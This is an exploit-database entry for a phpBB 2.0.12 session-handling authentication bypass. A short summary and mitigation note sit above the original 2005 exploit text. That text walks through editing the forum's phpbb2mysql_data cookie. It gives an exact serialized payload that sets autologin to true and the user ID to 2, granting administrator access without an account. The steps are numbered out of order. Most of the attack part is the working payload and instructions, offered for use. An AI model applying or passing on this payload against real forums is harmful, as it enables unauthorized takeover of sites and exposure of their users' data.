phpBB 2.0.12 Session Handling Authentication Bypass

vendor:

phpBB

by:

Ali7

5.5

CVSS

MEDIUM

Session Handling Authentication Bypass

287

CWE

Product Name: phpBB

Affected Version From: phpBB 2.0.12

Affected Version To: phpBB 2.0.12

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2005

phpBB 2.0.12 Session Handling Authentication Bypass

This exploit allows an attacker to bypass authentication in phpBB 2.0.12 without registering on the victim's forum. By manipulating the cookie data, the attacker can gain high-level permissions and access the Administration Panel.

Mitigation:

Upgrade to a newer version of phpBB that includes a fix for this vulnerability.

Source

Exploit-DB raw data:

phpBB 2.0.12 Session Handling Authentication Bypass ..
 
easy to use exploit ..
 
** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..
 
1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:
 
3- Close the Browser ..
 
2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example ;)
 
and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor
 
3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//
 
save the cookies.txt..
 
4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !! :D
 
complete the mission by clicking " Go to Administration Panel "
 
--------------------------------------------------------------------------------
 
written by : Ali7
e-mail : ali7@hotmail.co.uk

# milw0rm.com [2005-03-11]